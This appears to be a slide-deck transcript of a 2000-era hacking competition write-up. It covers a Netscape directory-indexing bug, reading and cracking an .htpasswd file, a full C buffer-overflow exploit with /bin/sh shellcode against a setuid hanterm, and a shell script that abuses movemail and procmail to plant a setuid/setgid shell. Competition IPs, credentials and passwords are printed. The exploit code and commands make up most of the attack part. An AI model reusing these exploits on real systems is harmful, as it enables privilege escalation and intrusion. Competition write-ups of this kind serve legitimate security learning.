1st OlymFair Workshop Hacking technique - PowerPoint PPT Presentation

About This Presentation
Title:

1st OlymFair Workshop Hacking technique

Description:

1st OlymFair Workshop Hacking technique Taeho Oh ohhara_at_4dl.com ohhara_at_postech.edu http://postech.edu/~ohhara – PowerPoint PPT presentation

Number of Views:77
Avg rating:3.0/5.0
Slides: 41
Provided by: saran151
Category:

less

Transcript and Presenter's Notes

Title: 1st OlymFair Workshop Hacking technique


1
1st OlymFair WorkshopHacking technique
  • Taeho Oh
  • ohhara_at_4dl.com
  • ohhara_at_postech.edu
  • http//postech.edu/ohhara

2
Contents
  • How to pass level 1
  • How to pass level 2
  • Why did many hackers consume much time in the
    level 2?
  • About level 3
  • Conclusion

3
How to pass level 1 (1)
  • What to do?
  • Execute /cgi-bin/data/idaccess.cgi and get the
    way to go to level 2

4
How to pass level 1 (2)
  • Level 1 servers
  • 203.227.243.161
  • 203.227.243.162
  • 203.227.243.163

5
How to pass level 1 (3)
  • 203.227.243.161
  • OS Solaris 8
  • Opened TCP port 80, 8080

6
How to pass level 1 (4)
  • 203.227.243.162
  • OS HPUX 11.0
  • Opened TCP port 22, 80, 8080

7
How to pass level 1 (5)
  • 203.227.243.163
  • OS MS Windows 2000
  • Opened TCP port 7, 9, 13, 17, 19, 25, 80, 135,
    139, 443, 1025, 1026, 1032, 1723, 3389

8
How to pass level 1 (6)
  • Attack 203.227.243.161
  • 80 Apache Web Server
  • 8080 Netscape Enterprise Server
  • 80 and 8080 web server has same httpd home
    directory
  • Netscape Enterprise Server has a security bug

9
How to pass level 1 (7)
  • Netscape Enterprise Server security bug
  • I could see files in the specific directory like
    below
  • http//203.227.243.161/?wp-cs-dump
  • You can also use ?wp-ver-info, ?wp-html-rend,
    ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link,
    ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout
  • I could browse the directories and check the file
    existence

10
How to pass level 1 (8)
  • The file list

Cant access this directory
/ ----- cgi-bin/ ----- data/ ----- hackme/
----- a ----- a.c ----- show_file.html
----- showfile.cgi ----- data/ ----- index.
html
11
How to pass level 1 (9)
  • Read .htaccess file with showfile.cgi
  • http//203.227.243.161/cgi-bin/hackme/showfile.cgi
    ?NAME/cgi-bin/data/.htaccess
  • Read .htpasswd file from .htaccess with
    showfile.cgi
  • http//203.227.243.161/cgi-bin/hackme/showfile.cgi
    ?NAME/cgi-bin/data/.htpasswd

12
How to pass level 1 (10)
  • I could crack the encrypted password from
    .htpasswd with Crack
  • idpassword adminbanana
  • I could access /cgi-bin/data directory with this
    id and password

13
How to pass level 1 (11)
  • I could get the way to go to level 2
  • http//203.227.243.161/data/idaccess.html
  • This page is the form that executes
    http//203.227.243.161/cgi-bin/data/idaccess.cgi
  • My serial number
  • KOR000321-961829513
  • My password
  • oD8YEuqYySWogKSQQsOY00zoAjUkxtv7

14
How to pass level 1 (12)
  • Netscape Enterprise Server directory indexing
    vulnerability
  • See http//www.securityfocus.com/vdb/bottom.html?v
    id1063

15
How to pass level 1 (13)
  • Netscape Enterprise Server directory indexing
    vulnerability patch information

The Directory Indexing feature can be turned off
via the Administration Interface. Selecting
Content Management -gt Document Preferences and
changing Directory Indexing to "none" will
disable this feature.Also, manually editing the
file obj.conf will do the same. Conduct a search
for the followingServicenbspmethod"(GETHEAD)
"nbsptype"magnus-internal/directory"fn"index-
common"and replace fn"index-common" with
fn"send-error".
16
How to pass level 2 (1)
  • What to do?
  • Execute /home/forbidden/pass.cgi
  • This executable file owner is root
  • This executable file group is wizard
  • The permission is 0510
  • Need wizard gid to execute /home/forbidden/pass.cg
    i

17
How to pass level 2 (2)
  • Level 2 server
  • 203.227.243.164
  • 203.227.243.164
  • OS Linux
  • Opened TCP port 23, 81

18
How to pass level 2 (3)
  • Wizard setuid or setgid files

-r-sr-xr-x 1 wizard wizard 26309 Jan 4
0940 /sbin/pwdb_chkpwd -rwsr-sr-x 1 wizard
wizard 47692 Mar 29 1999 /sbin/dump -rwsr-xr
-x 1 wizard wizard 10708 Apr 20 1999
/sbin/cardctl -rws--x--x 1 wizard wizard
6148 May 15 1999 /usr/X11R6/bin/Xwrapper -rws--x
--x 1 wizard wizard 158180 May 14 1999
/usr/X11R6/bin/hanterm -rwsr-xr-x 1 wizard
wizard 33120 Mar 22 1999 /usr/bin/at -rwsr-x
r-x 1 wizard wizard 3208 Mar 23 1999
/usr/bin/disable-paste -r-sr-x--- 1 wizard
wizard 42652 Aug 31 1999 /usr/bin/inndstart
-r-sr-x--- 1 wizard wizard 40060 Aug 31
1999 /usr/bin/startinnfeed -r-sr-sr-x 1 wizard
wizard 15816 Jan 7 0741
/usr/bin/lpq -r-sr-sr-x 1 wizard wizard
15608 Jan 7 0741 /usr/bin/lpr -r-sr-sr-x 1
wizard wizard 16248 Jan 7 0741
/usr/bin/lprm
19
How to pass level 2 (4)
  • Wizard setuid or setgid files ( Cont. )

-rws--x--x 2 wizard wizard 517916 Apr 7
1999 /usr/bin/suidperl -rws--x--x 2 wizard
wizard 517916 Apr 7 1999 /usr/bin/sperl5.005
03 -rwsr-sr-x 1 wizard wizard 64468 Apr
7 1999 /usr/bin/procmail -rwsr-xr-x 1 wizard
wizard 14036 Apr 16 1999 /usr/bin/rcp -rwsr-
xr-x 1 wizard wizard 10516 Apr 16 1999
/usr/bin/rlogin -rwsr-xr-x 1 wizard wizard
7780 Apr 16 1999 /usr/bin/rsh -rwxr-sr-x 1
wizard wizard 17832 May 14 1999
/usr/lib/emacs/20.3/i386-redhat-linux/movemail -rw
sr-sr-x 1 wizard wizard 299364 Apr 20
1999 /usr/sbin/sendmail -rwsr-xr-x 1 wizard
wizard 16488 Mar 23 1999 /usr/sbin/tracerout
e -rwsr-xr-x 1 wizard wizard 18040 Jan
8 0524 /usr/sbin/userhelper -rwxr-sr-x 1
wizard wizard 3860 Apr 20 1999
/sbin/netreport
20
How to pass level 2 (5)
  • Attack process

Create wizard uid, gid file
Get level2 shell
Get wizard euid
Get wizard gid
Get wizard uid
Execute pass.cgi
21
How to pass level 2 (6)
  • level2 shell ? wizard euid
  • Exploit hanterm bug

I have no name!_at_level2 ... hanterm -hfn perl
-e "print 'A'x240" can't load english font
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA AAAAAAAAAAAAAAAAAAAAAAAA I have no
name!_at_level2 ... hanterm -hfn perl -e "print
'A'x250" Segmentation fault I have no
name!_at_level2 ...
22
How to pass level 2 (7)
  • level2 shell ? wizard euid (Cont.)
  • This is a classical buffer overflow bug
  • I could get wizard euid shell with 260 buffer
    size and -450 offset

23
How to pass level 2 (8)
  • Exploit code

includeltstdio.hgt includeltstdlib.hgt define
OFFSET -450 define
RET_POSITION 260 define RANGE
20 define NOP
0x90 char shellcode1024 "\x
eb\x1f / jmp 0x1f / "\x5e /
popl esi / "\x89\x76\x08 / movl
esi,0x8(esi) /
24
How to pass level 2 (9)
  • Exploit code (Cont.)

"\x31\xc0 / xorl eax,eax
/ "\x88\x46\x07 / movb eax,0x7(esi)
/ "\x89\x46\x0c / movl eax,0xc(esi)
/ "\xb0\x0b / movb 0xb,al
/ "\x89\xf3 / movl esi,ebx
/ "\x8d\x4e\x08 / leal 0x8(esi),ecx
/ "\x8d\x56\x0c / leal 0xc(esi),edx
/ "\xcd\x80 / int 0x80
/ "\x31\xdb / xorl ebx,ebx
/ "\x89\xd8 / movl ebx,eax /
25
How to pass level 2 (10)
  • Exploit code (Cont.)

"\x40 / inc eax
/ "\xcd\x80 / int 0x80
/ "\xe8\xdc\xff\xff\xff / call -0x24
/ "/bin/sh" / .string \"/bin/sh\"
/ unsigned long get_sp(void)
__asm__("movl esp,eax") void main(int
argc,char argv)
26
How to pass level 2 (11)
  • Exploit code (Cont.)

char buffRET_POSITIONRANGE1,ptr long
addr_ptr,addr unsigned long sp int
offsetOFFSET,bsizeRET_POSITIONRANGE1 int
i if(argcgt1) offsetatoi(argv1) spget_sp(
) addrsp-offset ptrbuff
27
How to pass level 2 (12)
  • Exploit code (Cont.)

addr_ptr(long)ptr for(i0iltbsizei4) (a
ddr_ptr)addr for(i0iltbsize-RANGE2-strlen(s
hellcode)i) buffiNOP ptrbuffbsize-RANG
E2-strlen(shellcode)-1 for(i0iltstrlen(shellco
de)i) (ptr)shellcodei buffbsize-1'
\0'
28
How to pass level 2 (13)
  • Exploit code (Cont.)

execl("/usr/X11R6/bin/hanterm","hanterm",-hfn",b
uff,0)
29
How to pass level 2 (14)
  • wizard euid ? wizard uid

I have no name!_at_level2 ... cat gt
a.c main() setreuid(501,501) execl("/bin/sh","
sh",0) I have no name!_at_level2 ... gcc a.c
./a.out wizard_at_level2 ...
whoami wizard wizard_at_level2 ...
30
How to pass level 2 (15)
  • wizard uid ? create wizard uid, gid file
  • movemail program is wizard setgid program
  • movemail program output file is wizard gid

wizard_at_level2 ... echo haha gt
test1 wizard_at_level2 ... movemail test1
test2 wizard_at_level2 ... ls l test1
test2 -rw-r--r-- 1 wizard hackers 0 Jul 10
0203 test1 -rw-r--r-- 1 wizard wizard 5 Jul
10 0203 test2 wizard_at_level2 ... cat
test2 haha
31
How to pass level 2 (16)
  • wizard uid, gid file ? wizard gid
  • procmail can execute a arbitrary shell command
    with wizard uid, gid when the user can create
    wizard uid, gid file

32
How to pass level 2 (17)
  • Exploit code

!/bin/sh PATHPATH/usr/lib/emacs/20.3/i386-re
dhat-linux export PATH cat gt shh.c ltlt
EOF main() setreuid(501,501)
setregid(501,501) execl("/bin/sh","sh",0)
EOF
33
How to pass level 2 (18)
  • Exploit code (Cont.)

gcc shh.c -o shh movemail shh shh2 cat gt proc ltlt
EOF 0 /bin/chmod 6777 /tmp/shh2 EOF
34
How to pass level 2 (19)
  • Exploit code (Cont.)

movemail proc /home/wizard/.procmailrc echo haha
/usr/sbin/sendmail -OQueueDirectory/tmp
wizard sleep 2 rm -f /home/wizard/.procmailrc rm
-f ./proc rm -f ./exp rm -f ./shh.c rm -f
./shh echo "rm -f ./shh2" ./shh2
35
How to pass level 2 (20)
  • wizard gid ? execute pass.cgi

Congratulation!! You have passed Level 2. Your ID
KOR000321-961829513 Initial Pass Time Stamp
2000-06-30 135930GMT9 IP for Level 3 is
203.227.243.173 It is protected by ip
filtering. Please attack and acquire
adminstrator's privilege.And then change the
index.htm l under level3 server. Level 3 Login ID
level3 Level 4 Login Passwd olymfair3
36
Why did many hackers consume much time in the
level 2? (1)
  • Almost all hackers tried to find a security bug
  • However, level2 can be cleared with not a bug but
    a feature. ( except for hanterm bug )

37
Why did many hackers consume much time in the
level 2? (2)
  • /sbin/dump program has a buffer overflow bug and
    exploit is not released
  • Many hackers try to exploit this program.
    However, the exploit is impossible because main
    function does not return but exit

38
Why did many hackers consume much time in the
level 2? (3)
  • /usr/bin/lprm exploit code generates segmentation
    fault message
  • The segmentation fault message is not generated
    by /usr/bin/lprm. The message is generated by
    /usr/bin/lprm exploit code. Its an exploit code
    bug.

39
About level 3
  • I consumed much time so I have no time to attack
    level 3
  • I tried to scan level 3 server
  • However, I cant find opened TCP port
  • I didnt try to attack level 3 from then on
  • It seemed to take much time

40
Conclusion
  • It was an interesting hacking competition
Write a Comment
User Comments (0)
About PowerShow.com